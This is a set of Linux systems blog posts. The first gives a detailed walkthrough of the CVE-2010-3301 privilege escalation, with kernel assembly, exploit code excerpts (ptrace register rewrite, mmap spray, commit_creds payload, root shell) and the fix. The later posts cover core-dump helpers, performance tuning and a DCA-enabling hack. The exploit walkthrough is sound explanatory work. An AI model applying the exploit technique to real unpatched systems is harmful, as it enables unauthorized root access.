detailed explanation of a recent privilege escalation bug in linux (CVE-2010-3301) »

Created at: 27.09.2010 14:59, source: time to bleed by Joe Damato, tagged: linux security systems x86 bugfix kernel privilege escalation privileges syscall vulnerability x86_64


If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.

tl;dr

This article is going to explain how a recent privilege escalation exploit for the Linux kernel works. I’ll explain what the deal is from the kernel side and the exploit side.

This article is long and technical; prepare yourself.

ia32 syscall emulation

There are two ways to invoke system calls on the Intel/AMD family of processors:

  1. Software interrupt 0x80.
  2. The sysenter family of instructions.

The sysenter family of instructions are a faster syscall interface than the traditional int 0x80 interface, but aren’t available on some older 32bit Intel CPUs.

The Linux kernel has a layer of code to allow syscalls executed via int 0x80 to work on newer kernels. When a system call is invoked with int 0x80, the kernel rearranges state to pass off execution to the desired system call thus maintaing support for this older system call interface.

This code can be found at http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L380. We will examine this code much more closely very soon.

ptrace(2) and the ia32 syscall emulation layer

From the ptrace(2) man page (emphasis mine):

The ptrace() system call provides a means by which a parent process may observe and control the execution of another process, and examine and change its core image and registers. It is primarily used to implement break-point debugging and system call tracing.

If we examine the IA32 syscall emulation code we see some code in place to support ptrace1:

ENTRY(ia32_syscall)
/* . . . */
        GET_THREAD_INFO(%r10)
          orl $TS_COMPAT,TI_status(%r10)
        testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%r10)
        jnz ia32_tracesys

This code is placing a pointer to the thread control block (TCB) into the register r10 and then checking if ptrace is listening for system call notifications. If it is, a secondary code path is entered.

Let’s take a look2:

ia32_tracesys:
        /* . . . */
        call syscall_trace_enter
        LOAD_ARGS32 ARGOFFSET  /* reload args from stack in case ptrace changed it */
        RESTORE_REST
        cmpl $(IA32_NR_syscalls-1),%eax
        ja  int_ret_from_sys_call       /* ia32_tracesys has set RAX(%rsp) */
        jmp ia32_do_call
END(ia32_syscall)

Notice the LOAD_ARGS32 macro and comment above. That macro reloads register values after the ptrace syscall notification has fired. This is really fucking important because the userland parent process listening for ptrace notifications may have modified the registers which were loaded with data to correctly invoke a desired system call. It is crucial that these register values are untouched to ensure that the system call is invoked correctly.

Also take note of the sanity check for %eax: cmpl $(IA32_NR_syscalls-1),%eax

This check is ensuring that the value in %eax is less than or equal to (number of syscalls – 1). If it is, it executes ia32_do_call.

Let’s take a look at the LOAD_ARGS32 macro3:

.macro LOAD_ARGS32 offset, _r9=0
/* . . . */
movl \offset+40(%rsp),%ecx
movl \offset+48(%rsp),%edx
movl \offset+56(%rsp),%esi
movl \offset+64(%rsp),%edi
.endm

Notice that the register %eax is left untouched by this macro, even after the ptrace parent process has had a chance to modify its contents.

Let’s take a look at ia32_do_call which actually transfers execution to the system call4:

ia32_do_call:
        IA32_ARG_FIXUP
        call *ia32_sys_call_table(,%rax,8) # xxx: rip relative

The system call invocation code is calling the function whose address is stored at ia32_sys_call_table[8 * %rax]. That is, the (8 * %rax)th entry in the ia32_sys_call_table.

subtle bug leads to sexy exploit

This bug was originally discovered by the polish hacker “cliph” in 2007, fixed, but then reintroduced accidentally in early 2008.

The exploit is made by possible by three key things:

  1. The register %eax is not touched in the LOAD_ARGS macro and can be set to any arbitrary value by a call to ptrace.
  2. The ia32_do_call uses %rax, not %eax, when indexing into the ia32_sys_call_table.
  3. The %eax check (cmpl $(IA32_NR_syscalls-1),%eax) in ia32_tracesys only checks %eax. Any bits in the upper 32bits of %rax will be ignored by this check.

These three stars align and allow an attacker cause an integer overflow in ia32_do_call causing the kernel to hand off execution to an arbitrary address.

Damnnnnn, that’s hot.

the exploit, step by step

The exploit code is available here and was written by Ben Hawkes and others.

The exploit begins execution by forking and executing two copies of itself:

        if ( (pid = fork()) == 0) {
                ptrace(PTRACE_TRACEME, 0, 0, 0);
                execl(argv[0], argv[0], "2", "3", "4", NULL);
                perror("exec fault");
                exit(1);
        }

The child process is set up to be traced with ptrace by setting the PTRACE_TRACEME.

The parent process enters a loop:

        for (;;) {
                if (wait(&status) != pid)
                        continue;

                /* ... */

                rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
                if (rax == 0x000000000101) {
                        if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) {
                                printf("PTRACE_POKEUSER fault\n");
                                exit(1);
                        }
                        set = 1;
                }

                /* ... */

                if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) {
                        printf("PTRACE_SYSCALL fault\n");
                        exit(1);
                }
         }

The parents calls wait and blocks until entry into a system call. When a system call is entered, ptrace is invoked to read the value of the rax register. If the value is 0x101, ptrace is invoked to set the value of rax to 0x800000101 to cause an overflow as we’ll see shortly. ptrace is then invoked to resume execution in the child.

While this is happening, the child process is executing. It begins by looking the address of two symbols in the kernel:

	commit_creds = (_commit_creds) get_symbol("commit_creds");
	/* ... */

	prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
       /* ... */

Next, the child process attempts to create an anonymous memory mapping using mmap:

        if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,
                MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
          /* ... */

This mapping is created at the address tmp. tmp is set earlier to: 0xffffffff80000000 + (0x0000000800000101 * 8) (stored in kern_s in main).

This value actually causes an overflow, and wraps around to: 0x3f80000808. mmap only creates mappings on page-aligned addresses, so the mapping is created at: 0x3f80000000. This mapping is 64 megabytes large (stored in size).

Next, the child process writes the address of a function called kernelmodecode which makes use of the symbols commit_creds and prepare_kernel_cred which were looked up earlier:

int kernelmodecode(void *file, void *vma)
{
	commit_creds(prepare_kernel_cred(0));
	return -1;
}

The address of that function is written over and over to the 64mb memory that was mapped in:

        for (; (uint64_t) ptr < (tmp + size); ptr++)
                *ptr = (uint64_t)kernelmodecode;

Finally, the child process executes syscall number 0x101 and then executes a shell after the system call returns:

        __asm__("\n"
        "\tmovq $0x101, %rax\n"
        "\tint $0x80\n");

        /* . . . */
        execl("/bin/sh", "bin/sh", NULL);

tying it all together

When system call 0x101 is executed, the parent process (described above) receives a notification that a system call is being entered. The parent process then sets rax to a value which will cause an overflow: 0x800000101 and resumes execution in the child.

The child executes the erroneous check described above:

        cmpl $(IA32_NR_syscalls-1),%eax
        ja  int_ret_from_sys_call       /* ia32_tracesys has set RAX(%rsp) */
        jmp ia32_do_call

Which succeeds, because it is only comparing the lower 32bits of rax (0x101) to IA32_NR_syscalls-1.

Next, execution continues to ia32_do_call, which causes an overflow, since rax contains a very large value.

call *ia32_sys_call_table(,%rax,8)

Instead of calling the function whose address is stored in the ia32_sys_call_table, the address is pulled from the memory the child process mapped in, which contains the address of the function kernelmodecode.

kernelmodecode is part of the exploit, but the kernel has access to the entire address space and is free to begin executing code wherever it chooses. As a result, kernelmodecode executes in kernel mode setting the privilege level of the process to those of init.

The system has been rooted.

The fix

The fix is to zero the upper half of eax and change the comparison to examine the entire register. You can see the diffs of the fix here and here.

Conclusions

  • Reading exploit code is fun. Sometimes you find particularly sexy exploits like this one.
  • The IA32 syscall emulation layer is, in general, pretty wild. I would not be surprised if more bugs are discovered in this section of the kernel.
  • Code reviews play a really important part of overall security for the Linux kernel, but subtle bugs like this are very difficult to catch via code review.
  • I'm not a Ruby programmer.

If you enjoyed this article, subscribe (via RSS or e-mail) and follow me on twitter.

References

  1. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L424
  2. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L439
  3. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L50
  4. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L430


more »

an obscure kernel feature to get more info about dying processes »

Created at: 20.09.2010 14:59, source: time to bleed by Joe Damato, tagged: linux monitoring systems kernel


If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.

tl;dr

This post will describe how I stumbled upon a code path in the Linux kernel which allows external programs to be launched when a core dump is about to happen. I provide a link to a short and ugly Ruby script which captures a faulting process, runs gdb to get a backtrace (and other information), captures the core dump, and then generates a notification email.

I don’t care about faults because I use monit, god, etc

Chill.

Your processes may get automatically restarted when a fault occurs and you may even get an email letting you know your process died. Both of those things are useful, but it turns out that with just a tiny bit of extra work you can actually get very detailed emails showing a stack trace, register information, and a snapshot of the process’ files in /proc.

random walking the linux kernel

One day I was sitting around wondering how exactly the coredump code paths are wired. I cracked open the kernel source and started reading.

It wasn’t long until I saw this piece of code from exec.c1:

void do_coredump(long signr, int exit_code, struct pt_regs *regs)
{
  /* .... */
  lock_kernel();
  ispipe = format_corename(corename, signr);
  unlock_kernel();

   if (ispipe) {
   /* ... */

Hrm. ispipe? That seems interesting. I wonder what format_corename does and what ispipe means. Following through and reading format_corename2:

static int format_corename(char *corename, long signr)
{
	/* ... */

        const char *pat_ptr = core_pattern;
        int ispipe = (*pat_ptr == '|');

	/* ... */

        return ispipe;
}

In the above code, core_pattern (which can be set with a sysctl or via /proc/sys/kernel/core_pattern) to determine if the first character is a |. If so, format_corename returns 1. So | seems relatively important, but at this point I’m still unclear on what it actually means.

Scanning the rest of the code for do_coredump reveals something very interesting3 (this is more code from the function in the first code snippet above):

     /* ... */

     helper_argv = argv_split(GFP_KERNEL, corename+1, NULL);

     /* ... */

     retval = call_usermodehelper_fns(helper_argv[0], helper_argv,
                             NULL, UMH_WAIT_EXEC, umh_pipe_setup,
                             NULL, &cprm);

    /* ... */

WTF? call_usermodehelper_fns? umh_pipe_setup? This is looking pretty interesting. If you follow the code down a few layers, you end up at call_usermodehelper_exec which has the following very enlightening comment:

/**
 * call_usermodehelper_exec - start a usermode application
 *
 *  . . .
 *
 * Runs a user-space application.  The application is started
 * asynchronously if wait is not set, and runs as a child of keventd.
 * (ie. it runs with full root capabilities).
 */

what it all means

All together this is actually pretty fucking sick:

  • You can set /proc/sys/kernel/core_pattern to run a script when a process is going to dump core.
  • Your script is run before the process is killed.
  • A pipe is opened and attached to your script. The kernel writes the coredump to the pipe. Your script can read it and write it to storage.
  • Your script can attach GDB, get a backtrace, and gather other information to send a detailed email.

But the coolest part of all:

  • All of the files in /proc/[pid] for that process remain intact and can be inspected. You can check the open file descriptors, the process’s memory map, and much much more.

ruby codez to harness this amazing code path

I whipped up a pretty simple, ugly, ruby script. You can get it here. I set up my system to use it by:

% echo "|/path/to/core_helper.rb %p %s %u %g" > /proc/sys/kernel/core_pattern

Where:

  • %pPID of the dying process
  • %s – signal number causing the core dump
  • %u – real user id of the dying process
  • %g – real group id of the dyning process

Why didn’t you read the documentation instead?

This (as far as I can tell) little-known feature is documented at linux-kernel-source/Documentation/sysctl/kernel.txt under the “core_pattern” section. I didn’t read the documentation because (little known fact) I actually don’t know how to read. I found the code path randomly and it was much more fun an interesting to discover this little feature by diving into the code.

Conclusion

  • This could/should probably be a feature/plugin/whatever for god/monit/etc instead of a stand-alone script.
  • Reading code to discover features doesn’t scale very well, but it is a lot more fun than reading documentation all the time. Also, you learn stuff and reading code makes you a better programmer.

References

  1. http://lxr.linux.no/linux+v2.6.35.4/fs/exec.c#L1836
  2. http://lxr.linux.no/linux+v2.6.35.4/fs/exec.c#L1446
  3. http://lxr.linux.no/linux+v2.6.35.4/fs/exec.c#L1836


more »

Useful kernel and driver performance tweaks for your Linux server »

Created at: 28.07.2009 13:20, source: time to bleed by Joe Damato, tagged: linux monitoring systems BIOS kernel performance scaling system health x86 x86_64


This article is going to address some kernel and driver tweaks that are interesting and useful. We use several of these in production with excellent performance, but you should proceed with caution and do research prior to trying anything listed below.

Tickless System

The tickless kernel feature allows for on-demand timer interrupts. This means that during idle periods, fewer timer interrupts will fire, which should lead to power savings, cooler running systems, and fewer useless context switches.

Kernel option: CONFIG_NO_HZ=y

Timer Frequency

You can select the rate at which timer interrupts in the kernel will fire. When a timer interrupt fires on a CPU, the process running on that CPU is interrupted while the timer interrupt is handled. Reducing the rate at which the timer fires allows for fewer interruptions of your running processes. This option is particularly useful for servers with multiple CPUs where processes are not running interactively.

Kernel options: CONFIG_HZ_100=y and CONFIG_HZ=100

Connector

The connector module is a kernel module which reports process events such as fork, exec, and exit to userland. This is extremely useful for process monitoring. You can build a simple system (or use an existing one like god) to watch mission-critical processes. If the processes die due to a signal (like SIGSEGV, or SIGBUS) or exit unexpectedly you’ll get an asynchronous notification from the kernel. The processes can then be restarted by your monitor keeping downtime to a minimum when unexpected events occur.

Kernel options: CONFIG_CONNECTOR=y and CONFIG_PROC_EVENTS=y

TCP segmentation offload (TSO)

A popular feature among newer NICs is TCP segmentation offload (TSO). This feature allows the kernel to offload the work of dividing large packets into smaller packets to the NIC. This frees up the CPU to do more useful work and reduces the amount of overhead that the CPU passes along the bus. If your NIC supports this feature, you can enable it with ethtool:

[joe@timetobleed]% sudo ethtool -K eth1 tso on

Let’s quickly verify that this worked:

[joe@timetobleed]% sudo ethtool -k eth1
Offload parameters for eth1:
rx-checksumming: on
tx-checksumming: on
scatter-gather: on
tcp segmentation offload: on
udp fragmentation offload: off
generic segmentation offload: on
large receive offload: off

[joe@timetobleed]% dmesg | tail -1
[892528.450378] 0000:04:00.1: eth1: TSO is Enabled

Intel I/OAT DMA Engine

This kernel option enables the Intel I/OAT DMA engine that is present in recent Xeon CPUs. This option increases network throughput as the DMA engine allows the kernel to offload network data copying from the CPU to the DMA engine. This frees up the CPU to do more useful work.

Check to see if it’s enabled:

[joe@timetobleed]% dmesg | grep ioat
ioatdma 0000:00:08.0: setting latency timer to 64
ioatdma 0000:00:08.0: Intel(R) I/OAT DMA Engine found, 4 channels, device version 0x12, driver version 3.64
ioatdma 0000:00:08.0: irq 56 for MSI/MSI-X

There’s also a sysfs interface where you can get some statistics about the DMA engine. Check the directories under /sys/class/dma/.

Kernel options: CONFIG_DMADEVICES=y and CONFIG_INTEL_IOATDMA=y and CONFIG_DMA_ENGINE=y and CONFIG_NET_DMA=y and CONFIG_ASYNC_TX_DMA=y

Direct Cache Access (DCA)

Intel’s I/OAT also includes a feature called Direct Cache Access (DCA). DCA allows a driver to warm a CPU cache. A few NICs support DCA, the most popular (to my knowledge) is the Intel 10GbE driver (ixgbe). Refer to your NIC driver documentation to see if your NIC supports DCA. To enable DCA, a switch in the BIOS must be flipped. Some vendors supply machines that support DCA, but don’t expose a switch for DCA. If that is the case, see my last blog post for how to enable DCA manually.

You can check if DCA is enabled:

[joe@timetobleed]% dmesg | grep dca
dca service started, version 1.8

If DCA is possible on your system but disabled you’ll see:

ioatdma 0000:00:08.0: DCA is disabled in BIOS

Which means you’ll need to enable it in the BIOS or manually.

Kernel option: CONFIG_DCA=y

NAPI

The “New API” (NAPI) is a rework of the packet processing code in the kernel to improve performance for high speed networking. NAPI provides two major features1:

Interrupt mitigation: High-speed networking can create thousands of interrupts per second, all of which tell the system something it already knew: it has lots of packets to process. NAPI allows drivers to run with (some) interrupts disabled during times of high traffic, with a corresponding decrease in system load.

Packet throttling: When the system is overwhelmed and must drop packets, it’s better if those packets are disposed of before much effort goes into processing them. NAPI-compliant drivers can often cause packets to be dropped in the network adaptor itself, before the kernel sees them at all.

Many recent NIC drivers automatically support NAPI, so you don’t need to do anything. Some drivers need you to explicitly specify NAPI in the kernel config or on the command line when compiling the driver. If you are unsure, check your driver documentation. A good place to look for docs is in your kernel source under Documentation, available on the web here: http://lxr.linux.no/linux+v2.6.30/Documentation/networking/ but be sure to select the correct kernel version, first!

Older e1000 drivers (newer drivers, do nothing): make CFLAGS_EXTRA=-DE1000_NAPI install

Throttle NIC Interrupts

Some drivers allow the user to specify the rate at which the NIC will generate interrupts. The e1000e driver allows you to pass a command line option InterruptThrottleRate

when loading the module with insmod. For the e1000e there are two dynamic interrupt throttle mechanisms, specified on the command line as 1 (dynamic) and 3 (dynamic conservative). The adaptive algorithm traffic into different classes and adjusts the interrupt rate appropriately. The difference between dynamic and dynamic conservative is the the rate for the “Lowest Latency” traffic class, dynamic (1) has a much more aggressive interrupt rate for this traffic class.

As always, check your driver documentation for more information.

With modprobe: insmod e1000e.o InterruptThrottleRate=1

Process and IRQ affinity

Linux allows the user to specify which CPUs processes and interrupt handlers are bound.

  • Processes You can use taskset to specify which CPUs a process can run on
  • Interrupt Handlers The interrupt map can be found in /proc/interrupts, and the affinity for each interrupt can be set in the file smp_affinity in the directory for each interrupt under /proc/irq/

This is useful because you can pin the interrupt handlers for your NICs to specific CPUs so that when a shared resource is touched (a lock in the network stack) and loaded to a CPU cache, the next time the handler runs, it will be put on the same CPU avoiding costly cache invalidations that can occur if the handler is put on a different CPU.

However, reports2 of up to a 24% improvement can be had if processes and the IRQs for the NICs the processes get data from are pinned to the same CPUs. Doing this ensures that the data loaded into the CPU cache by the interrupt handler can be used (without invalidation) by the process; extremely high cache locality is achieved.

oprofile

oprofile is a system wide profiler that can profile both kernel and application level code. There is a kernel driver for oprofile which generates collects data in the x86’s Model Specific Registers (MSRs) to give very detailed information about the performance of running code. oprofile can also annotate source code with performance information to make fixing bottlenecks easy. See oprofile’s homepage for more information.

Kernel options: CONFIG_OPROFILE=y and CONFIG_HAVE_OPROFILE=y

epoll

epoll(7) is useful for applications which must watch for events on large numbers of file descriptors. The epoll interface is designed to easily scale to large numbers of file descriptors. epoll is already enabled in most recent kernels, but some strange distributions (which will remain nameless) have this feature disabled.

Kernel option: CONFIG_EPOLL=y

Conclusion

  • There are a lot of useful levers that can be pulled when trying to squeeze every last bit of performance out of your system
  • It is extremely important to read and understand your hardware documentation if you hope to achieve the maximum throughput your system can achieve
  • You can find documentation for your kernel online at the Linux LXR. Make sure to select the correct kernel version because docs change as the source changes!

Thanks for reading and don’t forget to subscribe (via RSS or e-mail) and follow me on twitter.

References

  1. http://www.linuxfoundation.org/en/Net:NAPI
  2. http://software.intel.com/en-us/articles/improved-linux-smp-scaling-user-directed-processor-affinity/


more »

Enabling BIOS options on a live server with no rebooting »

Created at: 06.07.2009 16:00, source: time to bleed by Joe Damato, tagged: linux scaling systems x86 BIOS kernel performance x86_64


This blog post is going to describe a C program that toggles some CPU and chipset registers directly to enable Direct Cache Access without needing a reboot or a switch in the BIOS. A very fun hack to write and investigate.

Special thanks…

Special thanks going out to Roman Nurik for helping me make the code CSS much, much prettier and easier to read.

Special thanks going out to Jake Douglas for convincing me that I shouldn’t use a stupid sensationalist title for this blog article :)

Intel I/OAT and Direct Cache Access (DCA)

From the Linux Foundation I/OAT project page1:

I/OAT (I/O Acceleration Technology) is the name for a collection of techniques by Intel to improve network throughput. The most significant of these is the DMA engine. The DMA engine is meant to offload from the CPU the copying of [socket buffer] data to the user buffer. This is not a zero-copy receive, but does allow the CPU to do other work while the copy operations are performed by the DMA engine.

Cool! So by using I/OAT the network stack in the Linux kernel can offload copy operations to increase throughput. I/OAT also includes a feature called Direct Cache Access (DCA) which can deliver data directly into processor caches. This is particularly cool because when a network interrupt arrives and data is copied to system memory, the CPU which will access this data will not cause a cache-miss on the CPU because DCA has already put the data it needs in the cache. Sick.

Measurements from the Linux Foundation project2 indicate a 10% reduction in CPU usage, while the Myri-10G NIC website claims they’ve measured a 40% reduction in CPU usage3. For more information describing the performance benefits of DCA see this incredibly detailed paper: Direct Cache Access for High Bandwidth Network I/O.

How to get I/OAT and DCA

To get I/OAT and DCA you need a few things:

  • Intel XEON CPU(s)
  • A NIC(s) which has DCA support
  • A chipset which supports DCA
  • The ioatdma and dca Linux kernel modules
  • And last but not least, a switch in your BIOS to turn DCA on

That last item can actually be a bit more tricky than it sounds for several reasons:

  • some BIOSes don’t expose a way to turn DCA on even though it is supported by the CPU, chipset, and NIC!
  • Your hosting provider may not allow BIOS access
  • Your system might be up and running and you don’t want to reboot to enter the BIOS to enable DCA

Let’s see what you can do to coerce DCA into working on your system if one of the above applies to you.

Build ioatdma kernel module

This is pretty easy, just make menuconfig and toggle I/OAT as a module. You must build it as a module if you cannot or do not want to enable DCA in your BIOS.

The option can be found in Device Drivers -> DMA Engine Support -> Intel I/OAT DMA Support.

Toggling that option will build the ioatdma and dca modules. Build and install the new module.

Enabling DCA without a reboot or BIOS access: Hack overview

In order to enable DCA a few special registers need to be touched.

  • The DCA capability bit in the PCI Express Control Register 4 in the configuration space for the PCI bridge your NIC(s) are attached to.
  • The DCA Model Specific Register on your CPU(s)

Let’s take a closer look at each stage of the hack.

Enable DCA in PCI Configuration Space

PCI configuration space is a memory region where control registers for PCI devices live. By changing register values, you can enable/disable specific features of that PCI device. The configuration space is addressable if you know the PCI bus, device, and function bits for a specific PCI device and the feature you care about.

To find the DCA register for the Intel 5000, 5100, and 7300 chipsets, we need to consult the documentation4:


Cool, so the register needed lives at offset 0×64. To enable DCA, bit 6 needs to be set to 1.

Toggling these register can be a bit cumbersome, but luckily there is libpci which provides some simple APIs to scan for PCI devices and accessing configuration space registers.

#define INTEL_BRIDGE_DCAEN_OFFSET   0x64
#define INTEL_BRIDGE_DCAEN_BIT      6
#define PCI_HEADER_TYPE_BRIDGE     1
#define PCI_VENDOR_ID_INTEL        0x8086 /* lol @ intel */
#define PCI_HEADER_TYPE             0x0e
#define MSR_P6_DCA_CAP             0x000001f8

void check_dca(struct pci_dev *dev)
{
  /* read DCA status */
  u32 dca = pci_read_long(dev, INTEL_BRIDGE_DCAEN_OFFSET);

  /* if it's not enabled */
  if (!(dca & (1 << INTEL_BRIDGE_DCAEN_BIT))) {
    printf("DCA disabled, enabling now.\n");

    /* enable it */
    dca |= 1 << INTEL_BRIDGE_DCAEN_BIT;

    /* write it back */
    pci_write_long(dev, INTEL_BRIDGE_DCAEN_OFFSET, dca);
  } else {
    printf("DCA already enabled!\n");
  }
}

int main(void)
{
  struct pci_access *pacc;
  struct pci_dev *dev;
  u8 type;

  pacc = pci_alloc();
  pci_init(pacc);

  /* scan the PCI bus */
  pci_scan_bus(pacc);

  /* for each device */
  for (dev = pacc->devices; dev; dev=dev->next) {
    pci_fill_info(dev, PCI_FILL_IDENT | PCI_FILL_BASES);

    /* if it's an intel device */
    if (dev->vendor_id == PCI_VENDOR_ID_INTEL) {

        /* read the header byte */
        type = pci_read_byte(dev, PCI_HEADER_TYPE);

        /* if its a PCI bridge, check and enable DCA */
        if (type == PCI_HEADER_TYPE_BRIDGE) {
          check_dca(dev);
        }
    }
  }

  msr_dca_enable();
  return 0;
}

Enable DCA in the CPU MSR

A model specific register (MSR) is a control register that is provided by a CPU to enable a feature that exists on a specific CPU. In this case, we care about the DCA MSR. In order to find it’s address, let’s consult the Intel Developer’s Manual 3B5.

This register lives at offset 0×1f8. We just need to set it to 1 and we should be good to go.

Thankfully, there are device files in /dev for the MSRs of each CPU:

#define MSR_P6_DCA_CAP      0x000001f8
void msr_dca_enable(void)
{
  char msr_file_name[64];
  int fd = 0, i = 0;
  u64 data;

  /* for each CPU */
  for (;i < NUM_CPUS; i++) {
    sprintf(msr_file_name, "/dev/cpu/%d/msr", i);

    /* open the MSR device file */
    fd = open(msr_file_name, O_RDWR);
    if (fd < 0) {
      perror("open failed!");
      exit(1);
    }

    /* read the current DCA status */
    if (pread(fd, &data, sizeof(data), MSR_P6_DCA_CAP) != sizeof(data)) {
      perror("reading msr failed!");
      exit(1);
    }

    printf("got msr value: %*llx\n", 1, (unsigned long long)data);

    /* if DCA is not enabled */
    if (!(data & 1)) {

      /* enable it */
      data |= 1;

      /* write it back */
      if (pwrite(fd, &data, sizeof(data), MSR_P6_DCA_CAP) != sizeof(data)) {
        perror("writing msr failed!");
        exit(1);
      }
    } else {
      printf("msr already enabled for CPU %d\n", i);
    }
  }
}

Code for the hack is on github

Get it here: http://github.com/ice799/dca_force/tree/master

Putting it all together to get your speed boost

  1. Checkout the hack from github: git clone git://github.com/ice799/dca_force.git
  2. Build the hack: make NUM_CPUS=whatever
  3. Run it: sudo ./dca_force
  4. Load the kernel module: sudo modprobe ioatdma
  5. Check your dmesg: dmesg | tail

You should see:

[   72.782249] dca service started, version 1.8
[   72.838853] ioatdma 0000:00:08.0: setting latency timer to 64
[   72.838865] ioatdma 0000:00:08.0: Intel(R) I/OAT DMA Engine found, 4 channels, device version 0x12, driver version 3.64
[   72.904027]   alloc irq_desc for 56 on cpu 0 node 0
[   72.904030]   alloc kstat_irqs on cpu 0 node 0
[   72.904039] ioatdma 0000:00:08.0: irq 56 for MSI/MSI-X

in your dmesg.

You should NOT SEE

[    8.367333] ioatdma 0000:00:08.0: DCA is disabled in BIOS

You can now enjoy the DCA performance boost your BIOS or hosting provider didn't want you to have!

Conclusion

  • Intel I/OAT and DCA is pretty cool, and enabling it can give pretty substantial performance wins
  • Cool features are sometimes stuffed away in the BIOS
  • If you don't have access to your BIOS, you should ask you provider nicely to do it for you
  • If your BIOS doesn't have a toggle switch for the feature you need, do a BIOS update
  • If all else fails and you know what you are doing, you can sometimes pull off nasty hacks like this in userland to get what you want

Thanks for reading and don't forget to subscribe (via RSS or e-mail) and follow me on twitter.

P.S.

I know, I know. I skipped Part 2 of the signals post (here's Part 1 if you missed it). Part 2 is coming soon!

References

  1. http://www.linuxfoundation.org/en/Net:I/OAT
  2. http://www.linuxfoundation.org/en/Net:I/OAT
  3. http://www.myri.com/serve/cache/626.html
  4. Intel® 7300 Chipset Memory Controller Hub (MCH) Datasheet, Section 4.8.12.6
  5. Intel® 64 and IA-32 Architectures Software Developer’s Manual Volume 3B: System Programming Guide, Part 2, Appendix B-19


more »